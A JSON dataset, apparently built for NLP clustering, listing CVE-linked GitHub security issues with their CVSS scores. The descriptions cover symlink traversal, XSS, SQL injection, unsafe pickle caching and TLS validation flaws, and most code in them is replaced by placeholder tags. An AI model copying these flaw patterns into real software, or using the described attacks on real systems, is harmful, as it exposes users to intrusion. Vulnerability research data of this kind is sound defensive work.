NLP/Models+K-Means/data/SIR_dataset_processed.json

[
    {
        "CVE_ID": "CVE-2011-4116",
        "Issue_Url_old": "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14",
        "Issue_Url_new": "https://github.com/perl-toolchain-gang/file-temp/issues/14",
        "Repo_new": "perl-toolchain-gang/file-temp",
        "Issue_Created_At": "2016-04-03T03:41:22Z",
        "description": "APITAG allows unsafe traversal of symlinks APITAG NUMBERTAG URLTAG Example... As user \"attacker\": ln s /tmp /tmp/exploit As user \"victim\": perl APITAG e APITAG APITAG print APITAG PATHTAG ) . \" \";' The temporary directory path that is returned includes the symlink owned by the \"attacker\" user.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2013-4891",
        "Issue_Url_old": "https://github.com/bcit-ci/CodeIgniter/issues/4020",
        "Issue_Url_new": "https://github.com/bcit-ci/codeigniter/issues/4020",
        "Repo_new": "bcit-ci/codeigniter",
        "Issue_Created_At": "2015-08-04T08:48:37Z",
        "description": "APITAG security and CVE database. Hello APITAG developers, I noticed a few known security vulnerabilities (CVE numbers) that apply to the APITAG project (official CPE name APITAG For APITAG are four registered CVE reports: CVETAG CVETAG CVETAG CVETAG For APITAG is just one known security report: CVETAG . Source: FILETAG I read some CVE related posts and I noticed that the value of a CVE database is not always appreciated or understood. Source: URLTAG URLTAG Nevertheless I'm wondering why there are not more CVE's reported so far. I've been pretty active in following the APITAG development and noticed last years that some security bugs have been fixed but are never reported to the CVE database. I'm happy that APITAG is an open source project and like to contribute to that. Especially using some of my IT security expertise. For that reason I'd like to work out some CVE reports about different security bugs in previous versions that are currently fixed. This way there will be a clear and open view about the amount of security vulnerabilities per version and hopefully this will encourage the developers who didn't upgrade, to upgrade to the latest version of APITAG For people who are unfamiliar to this world. In comparison and as an example this are the CVE lists of some other PHP frameworks and APITAG Yii: FILETAG Zend: FILETAG Symfony: FILETAG APITAG FILETAG I'd like to hear some thoughts about this and especially I'm wondering if I should just work out some APITAG and just submit the bugs to the CVE database, or to discuss those bugs here before submitting them, just to make sure. Any thoughts? Greetings!",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2013-7447",
        "Issue_Url_old": "https://github.com/mate-desktop/eom/issues/93",
        "Issue_Url_new": "https://github.com/mate-desktop/eom/issues/93",
        "Repo_new": "mate-desktop/eom",
        "Issue_Created_At": "2015-07-26T22:46:13Z",
        "description": "EOM crashes when trying to open a large PNG file. Hello, I would like to report a bug concerning EOM version NUMBERTAG When trying to open a large PNG file NUMBERTAG p NUMBERTAG px) EOM crashes. Environment: Debian NUMBERTAG EOM NUMBERTAG I've been able to catch a backtrace using gdb: APITAG received signal SIGSEGV, Segmentation fault. APITAG to Thread NUMBERTAG fd NUMBERTAG LWP NUMBERTAG fd NUMBERTAG fc NUMBERTAG f0 in APITAG () from PATHTAG (gdb) bt NUMBERTAG fd NUMBERTAG fc NUMBERTAG f0 in APITAG () from PATHTAG NUMBERTAG in eom_thumbnail_load NUMBERTAG in NUMBERTAG b1 in NUMBERTAG fd NUMBERTAG ca NUMBERTAG in g_thread_proxy (data NUMBERTAG bf NUMBERTAG at PATHTAG NUMBERTAG fd NUMBERTAG b NUMBERTAG a0a4 in start_thread (arg NUMBERTAG fd NUMBERTAG at APITAG NUMBERTAG fd NUMBERTAG b3cf NUMBERTAG d in clone () at PATHTAG Please let me know if you need the test file. Best regards",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2013-7458",
        "Issue_Url_old": "https://github.com/antirez/redis/issues/3284",
        "Issue_Url_new": "https://github.com/redis/redis/issues/3284",
        "Repo_new": "redis/redis",
        "Issue_Created_At": "2016-05-30T15:35:38Z",
        "description": "redis cli: permissions when opening history file. redis cli saves it's history here: URLTAG and uses the linenoise library to fopen the file there: URLTAG If the file does not exist, it's created with default umask NUMBERTAG so the file ends up with NUMBERTAG redis cli writes it's history to APITAG by default, which usually expands to a folder in /home, which is world accessible by default in a lot of distributions. This causes the file to be world readable. You could either call umask to change the default permissions or pass appropriate permissions when creating, like bash does: APITAG URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
        "severity": "LOW",
        "baseScore": 3.3,
        "impactScore": 1.4,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2013-7458",
        "Issue_Url_old": "https://github.com/antirez/linenoise/issues/121",
        "Issue_Url_new": "https://github.com/antirez/linenoise/issues/121",
        "Repo_new": "antirez/linenoise",
        "Issue_Created_At": "2016-06-18T01:24:57Z",
        "description": "Function to save history as private file by default. Add a function that guarantees no group nor world access when creating a new history file, but do not change the current file permission.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
        "severity": "LOW",
        "baseScore": 3.3,
        "impactScore": 1.4,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2013-7459",
        "Issue_Url_old": "https://github.com/dlitz/pycrypto/issues/176",
        "Issue_Url_new": "https://github.com/pycrypto/pycrypto/issues/176",
        "Repo_new": "pycrypto/pycrypto",
        "Issue_Created_At": "2015-12-14T23:33:48Z",
        "description": "AES.new with invalid parameter crashes python. In Crypto NUMBERTAG and Python NUMBERTAG and NUMBERTAG folowing code causes crash: from APITAG import AES APITAG NUMBERTAG APITAG b NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2013-7489",
        "Issue_Url_old": "https://github.com/bbangert/beaker/issues/191",
        "Issue_Url_new": "https://github.com/bbangert/beaker/issues/191",
        "Repo_new": "bbangert/beaker",
        "Issue_Created_At": "2020-05-14T18:02:40Z",
        "description": "Insecure data serialization method by default with pickle on Cache. Hello, Beaker uses Pickle on Session and Cache. On Session at least it has support to secret/HMAC but on caching it doesn't which can lead to arbitrary code execution. URLTAG Maybe it would be wise to expose data_serializer in Cache too and maybe even allow a secret definition for caching. What do you think?",
        "vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.8,
        "impactScore": 5.9,
        "exploitabilityScore": 0.9
    },
    {
        "CVE_ID": "CVE-2014-0087",
        "Issue_Url_old": "https://github.com/ManageIQ/manageiq/issues/1581",
        "Issue_Url_new": "https://github.com/manageiq/manageiq/issues/1581",
        "Repo_new": "manageiq/manageiq",
        "Issue_Created_At": "2015-02-05T08:32:09Z",
        "description": "Hardening of the RBAC check. The current code in APITAG that does RBAC checking is: CODETAG Meaning that if we do not find particular RBAC feature, we just validate the existence of a route and let the request in. The routes are whitelisted in the route file and effort was put into making sure that we have all the features defined. Right now I don't see an exploit for this as there would have to be extra route for this to an action what does not have RBAC feature and check defined. However for a developer it's easy to forget and expose something this way. Therefor we shoud we should change the code to: CODETAG and fix or change whatever is needed to be done to make everything work as before from the user perspective.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2014-5002",
        "Issue_Url_old": "https://github.com/panthomakos/lynx/issues/3",
        "Issue_Url_new": "https://github.com/panthomakos/lynx/issues/3",
        "Repo_new": "panthomakos/lynx",
        "Issue_Created_At": "2018-01-12T00:12:50Z",
        "description": "CVE: APITAG password exposed on the command line. CVETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2014-7919",
        "Issue_Url_old": "https://github.com/alexpark07/Bookmark/issues/1",
        "Issue_Url_new": "https://github.com/alexpark07/bookmark/issues/1",
        "Repo_new": "alexpark07/bookmark",
        "Issue_Created_At": "2016-07-12T17:28:56Z",
        "description": "can you match up one of your disclosures?. FILETAG CVETAG can you match this to a commit or Android Bug ID? Thanks!",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2014-8184",
        "Issue_Url_old": "https://github.com/liblouis/liblouis/issues/425",
        "Issue_Url_new": "https://github.com/liblouis/liblouis/issues/425",
        "Repo_new": "liblouis/liblouis",
        "Issue_Created_At": "2017-10-16T12:12:12Z",
        "description": "stack based buffer overflow ( CVETAG ). Hello, Do you have any commit for this issue? References: CVETAG CVETAG Thanks in advance!",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2014-9515",
        "Issue_Url_old": "https://github.com/DozerMapper/dozer/issues/410",
        "Issue_Url_new": "https://github.com/dozermapper/dozer/issues/410",
        "Repo_new": "dozermapper/dozer",
        "Issue_Created_At": "2017-05-29T20:08:26Z",
        "description": "Update references of package names to APITAG As we are releasing under the APITAG group id, the packages should also match.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2014-9515",
        "Issue_Url_old": "https://github.com/DozerMapper/dozer/issues/786",
        "Issue_Url_new": "https://github.com/dozermapper/dozer/issues/786",
        "Repo_new": "dozermapper/dozer",
        "Issue_Created_At": "2020-02-12T12:49:23Z",
        "description": "No indication if CVETAG is solved. Dozer NUMBERTAG has vulnerability CVETAG . I couldn't find any information about it in Dozer NUMBERTAG release notes and migration documents. It is either not fixed yet or the information is missing.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2014-9748",
        "Issue_Url_old": "https://github.com/libuv/libuv/issues/515",
        "Issue_Url_new": "https://github.com/libuv/libuv/issues/515",
        "Repo_new": "libuv/libuv",
        "Issue_Created_At": "2015-09-07T13:02:14Z",
        "description": "windows: xp rwlock fallback is unsound. It was pointed out by Zhou Ran that the fallback write mutex can end up getting unlocked by a different thread than the one that locked it, resulting in undefined behavior. Consider a rwlock that is initially unlocked: Thread A: increments reader count at t0 > acquires write lock at t0 > decrements reader count at t2 Thread B: increments reader count at t1 > decrements reader count at t3 > releases write lock at t3 See also URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2015-1378",
        "Issue_Url_old": "https://github.com/grml/grml-debootstrap/issues/59",
        "Issue_Url_new": "https://github.com/grml/grml-debootstrap/issues/59",
        "Repo_new": "grml/grml-debootstrap",
        "Issue_Created_At": "2015-01-20T15:49:50Z",
        "description": "Git HEAD: . The current code is sourcing APITAG from the directory that grml debootstrap is executed from: ERRORTAG To demonstrate it: APITAG Before sourcing that file, grml debootstrap should check if the current working directory is writable to non root users and deny sourcing if so.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2015-1590",
        "Issue_Url_old": "https://github.com/kamailio/kamailio/issues/48",
        "Issue_Url_new": "https://github.com/kamailio/kamailio/issues/48",
        "Repo_new": "kamailio/kamailio",
        "Issue_Created_At": "2015-01-20T09:46:30Z",
        "description": "multiple /tmp file vulnerabilities. Reported by: Helmut Grohne APITAG The kamailio package now installs PATHTAG which can be selected via the CFGFILE= setting in PATHTAG The configuration contains: APITAG This setting is insecure and may allow local users to elevate privileges to the kamailio user. The issue extends to kamailio APITAG It seems that this is due to an incomplete fix of NUMBERTAG Looking further, the state of /tmp file vulnerabilities in kamailio looks worrisome. Most of the results of the following command (to be executed in the kamailio source) are likely vulnerable if executed: APITAG Granted, some of the results are examples, documentation or obsolete. But quite a few reach the default settings: kamcmd defaults to connecting to PATHTAG The kamailio build definitely is vulnerable as can be seen in PATHTAG More research clearly is required here. Given these findings, the security team may want to veto the inclusion of kamailio in a stable release, which would be very unfortunate as kamailio is quite a unique piece of software with little competitors in its field. Helmut CVETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2015-1820",
        "Issue_Url_old": "https://github.com/rest-client/rest-client/issues/369",
        "Issue_Url_new": "https://github.com/rest-client/rest-client/issues/369",
        "Repo_new": "rest-client/rest-client",
        "Issue_Created_At": "2015-03-24T02:47:54Z",
        "description": "CVETAG : rest client passes values from Set Cookie headers to arbitrary redirection target. When Ruby rest client NUMBERTAG processes an HTTP redirection response, it blindly passes along the values from any Set Cookie headers to the redirection target, regardless of domain, path, or expiration. This is very similar to CVETAG , which affected python requests. URLTAG The issue could be similarly exploited in the following ways: If you are the redirection source (i.e. you can make rest client hit your URL), you can make rest client perform a request to any third party domain with cookies of your choosing. This may be useful in performing a session fixation attack. If you are the redirection target (i.e. you can make a third party site redirect to your URL), you can steal any cookies set by the third party redirection. The behavior was introduced in rest client NUMBERTAG by this commit: URLTAG All subsequently released NUMBERTAG and NUMBERTAG ersions are affected. This issue is expected to be fixed in a forthcoming rest client NUMBERTAG release.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2015-1828",
        "Issue_Url_old": "https://github.com/ruby/openssl/issues/8",
        "Issue_Url_new": "https://github.com/ruby/openssl/issues/8",
        "Repo_new": "ruby/openssl",
        "Issue_Created_At": "2015-03-24T22:27:01Z",
        "description": "Subject is not ensured to be verified even when APITAG is configured. Even if APITAG is configured, I/O is allowed with a remote server before the subject has been verified. VERIFY_PEER only checks the cert chain is rooted in the local truststore. It does not check if the subject is valid in and of itself. My understanding is the APITAG method must be called to ensure the subject is correctly verified. However, communication is allowed to remote services without verifying the subject. I would suggest throwing an exception if VERIFY_PEER is configured and I/O is attempted without first calling APITAG It would also be nice if this all happened automatically simply by passing hostname into APITAG (which AFAICT only affects SNI presently, and not subject verification)",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2015-20001",
        "Issue_Url_old": "https://github.com/rust-lang/rust/issues/25842",
        "Issue_Url_new": "https://github.com/rust-lang/rust/issues/25842",
        "Repo_new": "rust-lang/rust",
        "Issue_Created_At": "2015-05-27T22:07:40Z",
        "description": "APITAG is not exception safe. APITAG is using APITAG and may not be exception safe. I.e. it is in an inconsistent state after being recovered after panic. See issue NUMBERTAG and others. Relevant code is APITAG sift_down_range URLTAG cc MENTIONTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2015-2142",
        "Issue_Url_old": "https://github.com/a-v-k/phpBugTracker/issues/4",
        "Issue_Url_new": "https://github.com/a-v-k/phpbugtracker/issues/4",
        "Repo_new": "a-v-k/phpbugtracker",
        "Issue_Created_At": "2015-02-05T16:29:35Z",
        "description": "Multiple SQL injection , reflecting/stored XSS and CSRF vulnerabilities in APITAG NUMBERTAG Dear development team. I found multiple SQL injection , reflecting/stored XSS and CSRF vulnerabilities in your product APITAG NUMBERTAG Please provide me an email address where I can send the technical details to. Otherwise, if you don't mind, I can post them directly on Github. I have released a security advisory without technical details here: URLTAG If you don't respond until NUMBERTAG th February NUMBERTAG UTC NUMBERTAG I will as well release the technical details of these issues and send the vulnerabilities to the security mailing list APITAG to warn people. Thank you for your attention. Greetings from Germany. Steffen R\u00f6semann",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.0,
        "impactScore": 5.9,
        "exploitabilityScore": 2.1
    },
    {
        "CVE_ID": "CVE-2015-2674",
        "Issue_Url_old": "https://github.com/benoitc/restkit/issues/140",
        "Issue_Url_new": "https://github.com/benoitc/restkit/issues/140",
        "Repo_new": "benoitc/restkit",
        "Issue_Created_At": "2015-03-12T14:34:18Z",
        "description": "Doesn't Validate TLS. Restkit does not validate TLS which means it's HTTPS handling is broken and insecure. ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2015-2796",
        "Issue_Url_old": "https://github.com/Project-Pier/ProjectPier-Core/issues/37",
        "Issue_Url_new": "https://github.com/project-pier/projectpier-core/issues/37",
        "Repo_new": "project-pier/projectpier-core",
        "Issue_Created_At": "2015-03-31T14:18:33Z",
        "description": "Security Issue XSS CVETAG . An attacker can pass this URL (with XSS payload) to a victim (user of APITAG and can make the victim to perform some tasks or can infect the user. The vulnerability is XSS URLTAG The search_for parameter is not getting sanitized. You can use CVETAG cve id in your announcements when you fix this vulnerability. Thanks, Jaydeep",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2015-2912",
        "Issue_Url_old": "https://github.com/orientechnologies/orientdb/issues/4824",
        "Issue_Url_new": "https://github.com/orientechnologies/orientdb/issues/4824",
        "Repo_new": "orientechnologies/orientdb",
        "Issue_Created_At": "2015-08-19T21:38:03Z",
        "description": "Cross Site Request Forgery. The APITAG Server allows the usage of a parameter for the name of a callback function in http requests. If such a parameter is used in a http request the server sends the http response to the function which is specified in the parameter. This can be used to construct a malicious webpage which sends a get request to the APITAG server in order to get some content. An attacker can read the http response, because of the allowed callback function parameter. The APITAG server provides an interface to request specific entries of a database with the http method GET. For example the URL URLTAG response with JSON data of the record NUMBERTAG In the case of record NUMBERTAG its the information about the reader account with the hashed password. CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2015-3138",
        "Issue_Url_old": "https://github.com/the-tcpdump-group/tcpdump/issues/446",
        "Issue_Url_new": "https://github.com/the-tcpdump-group/tcpdump/issues/446",
        "Repo_new": "the-tcpdump-group/tcpdump",
        "Issue_Created_At": "2015-03-25T18:10:04Z",
        "description": "Possible heap overflows reading pcap. Hello, In learning how to use american fuzzy lop, I decided to make libpcap/tcpdump my first fuzzing foray. I was able to find two possible heap overflows in print wb.c (lines NUMBERTAG and NUMBERTAG Loading tcpdump NUMBERTAG in gdb and running the two testcases that consistently segfault: gdb PATHTAG CODETAG And... CODETAG What would be the best way to get the testcases to you that cause the crashes? Thanks!",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2015-3172",
        "Issue_Url_old": "https://github.com/jkk/eidogo/issues/27",
        "Issue_Url_new": "https://github.com/jkk/eidogo/issues/27",
        "Repo_new": "jkk/eidogo",
        "Issue_Created_At": "2015-06-14T20:15:36Z",
        "description": "XSS Security Vulnerability. APITAG is susceptible to Cross Site Scripting (XSS) attacks via maliciously crafted SGF input. There are actually two separate XSS vulnerabilities NUMBERTAG Text from comments and game info are unsafely added into the DOM directly via APITAG NUMBERTAG Any file loaded from URL that begins with a left curly bracket \"{\" is assumed to be JSON and unsafely parsed with eval. Here are examples exploiting each vulnerability: URLTAG URLTAG A patch attempting to mitigate these security vulnerabilities was submitted in this pull request: URLTAG See this pull request for more discussion of the changes. Note that the pull request does not include an updated minified file. However, a minified file incorporating this patch has been prepared by the OGS developers and is available here: FILETAG Compare with: FILETAG The identifier \" CVETAG \" has been assigned to refer to this issue. Disclosure timeline: April NUMBERTAG Developer privately notified of security vulnerability April NUMBERTAG Developer acknowledged notification May NUMBERTAG Pull request submitted May NUMBERTAG Several webmasters notified in advance June NUMBERTAG Public disclosure",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2015-3400",
        "Issue_Url_old": "https://github.com/zfsonlinux/zfs/issues/3319",
        "Issue_Url_new": "https://github.com/openzfs/zfs/issues/3319",
        "Repo_new": "openzfs/zfs",
        "Issue_Created_At": "2015-04-19T16:15:47Z",
        "description": "security issue: sharenfs always gives read access for world. Since NUMBERTAG sharenfs always gives read access to everyone. root APITAG zfs set APITAG PATHTAG root APITAG grep test_nfs PATHTAG PATHTAG APITAG PATHTAG APITAG root APITAG zfs set APITAG PATHTAG root APITAG grep test_nfs PATHTAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2015-3886",
        "Issue_Url_old": "https://github.com/gobby/gobby/issues/61",
        "Issue_Url_new": "https://github.com/gobby/gobby/issues/61",
        "Repo_new": "gobby/gobby",
        "Issue_Created_At": "2015-05-06T22:05:38Z",
        "description": "Gobby seems to silently accept expired certificates. Debian bug NUMBERTAG CVETAG reported that gobby silently accepts expired certificates. The mentioned site has since been fixed and I'm unsure if that'd be due to pinning or if there's a genuine validation error. APITAG then the function in libinfinity doesn't seem to tolerate expiry not even with pinning AFAICS.) The report in full: > At the moment the certificate of APITAG is expired (reported > separately as Bug NUMBERTAG but Jessie's gobby happily establishes a full > connection to it without any warning. This is a regression since Wheezy, > since it's not the case in gobby NUMBERTAG ersion NUMBERTAG which shows a > warning stating that the certificate has expired with the option to > accept it any way. > > It's strange (and perhaps relevant), but if one configures an empty file > as the APITAG CAs\" file in Jessie's gobby's security options, then > it lists the connection with a \"certificate expired\" error next to it in > the Document Browser pane. However, no prompt is shown, so it's not > possible to manually accept the expired certificate.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2015-3887",
        "Issue_Url_old": "https://github.com/rofl0r/proxychains-ng/issues/60",
        "Issue_Url_new": "https://github.com/rofl0r/proxychains-ng/issues/60",
        "Repo_new": "rofl0r/proxychains-ng",
        "Issue_Created_At": "2015-05-13T23:10:26Z",
        "description": "CVETAG RPATH flaw. URLTAG This line loads libproxychains4.so from the current directory which can be used by the attacker to load a manipulated library instead of original libproxychains4.so ref: CVETAG URLTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2015-4082",
        "Issue_Url_old": "https://github.com/jborg/attic/issues/271",
        "Issue_Url_new": "https://github.com/jborg/attic/issues/271",
        "Repo_new": "jborg/attic",
        "Issue_Created_At": "2015-04-05T11:10:31Z",
        "description": "potential decryption attack. assume attacker has access to your (still) encrypted repository and changes the manifest type byte to \"unencrypted / without key file\". your next automated backup will then run in unencrypted mode without you noticing it and you give all your data to the attacker who controls your backup device.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2015-4627",
        "Issue_Url_old": "https://github.com/delta/pragyan/issues/207",
        "Issue_Url_new": "https://github.com/delta/pragyan/issues/207",
        "Repo_new": "delta/pragyan",
        "Issue_Created_At": "2015-06-17T03:57:25Z",
        "description": "SQL injection vulnerability in Lastest version Pragyan CMS NUMBERTAG Dear developer team. We are a information security team from QIHU NUMBERTAG company, China. We found a SQL injection vulnerability in lastest version Pragyan CMS NUMBERTAG and already sent you the technical details to EMAILTAG . Thank you APITAG info] name: APITAG company: QIHU NUMBERTAG company, China email: g sec EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2015-5060",
        "Issue_Url_old": "https://github.com/anchorcms/anchor-cms/issues/875",
        "Issue_Url_new": "https://github.com/anchorcms/anchor-cms/issues/875",
        "Repo_new": "anchorcms/anchor-cms",
        "Issue_Created_At": "2015-06-24T17:43:45Z",
        "description": "DOM Based XSS attack through Search option. Hello all, The search option of the anchor CMS is properly escaped but an attacker can directly inject an XSS payload on the URL and it will execute properly. This happens in the most recent version of anchor CMS available to download from the FILETAG i.e.version NUMBERTAG The simple payload looks like this: URLTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2015-5237",
        "Issue_Url_old": "https://github.com/google/protobuf/issues/760",
        "Issue_Url_new": "https://github.com/protocolbuffers/protobuf/issues/760",
        "Repo_new": "protocolbuffers/protobuf",
        "Issue_Created_At": "2015-08-27T08:52:31Z",
        "description": "CVETAG : Integer overflow in serialization. int is used to express the size of serialized messages. If the size exceeds NUMBERTAG APITAG the application may allocate a buffer which is too small, or protobuf itself does this, in APITAG . It has been suggested that serialization of messages larger than NUMBERTAG APITAG is unsupported. But there is no good way for an application to ensure that the limit is not exceeded accidentally, without imposing rather draconian limits. To some degree, this is an gets style interface. Right now, this is more or less harmless because the message sizes involved are substantial. But this will change over time. My worry is that it will be difficult to fix this because some of the overflowing computations end up in generated APITAG files, so the eventual fix will not be a simple library update.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2015-5521",
        "Issue_Url_old": "https://github.com/BlackCatDevelopment/BlackCatCMS/issues/408",
        "Issue_Url_new": "https://github.com/blackcatdevelopment/blackcatcms/issues/408",
        "Repo_new": "blackcatdevelopment/blackcatcms",
        "Issue_Created_At": "2021-04-19T19:03:53Z",
        "description": "XSS Vulnerability on Modify Group Page. Summary An authenticated malicious user can take advantage of a XSS vulnerability in the APITAG Group\" feature in Admin Steps to Reproduce: Login into the Admin panel Go to PATHTAG Add group with name '\"> APITAG APITAG ' Save group. Impact Cookie Stealing A malicious user can steal cookies and use them to gain access to the application. Arbitrary requests An attacker can use XSS to send requests that appear to be from the victim to the web server. Malware download XSS can prompt the user to download malware. Since the prompt looks like a legitimate request from the site, the user may be more likely to trust the request and actually install the malware. Defacement attacker can deface the website using javascript code.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2015-5947",
        "Issue_Url_old": "https://github.com/salesagility/SuiteCRM/issues/333",
        "Issue_Url_new": "https://github.com/salesagility/suitecrm/issues/333",
        "Repo_new": "salesagility/suitecrm",
        "Issue_Created_At": "2015-08-05T19:30:34Z",
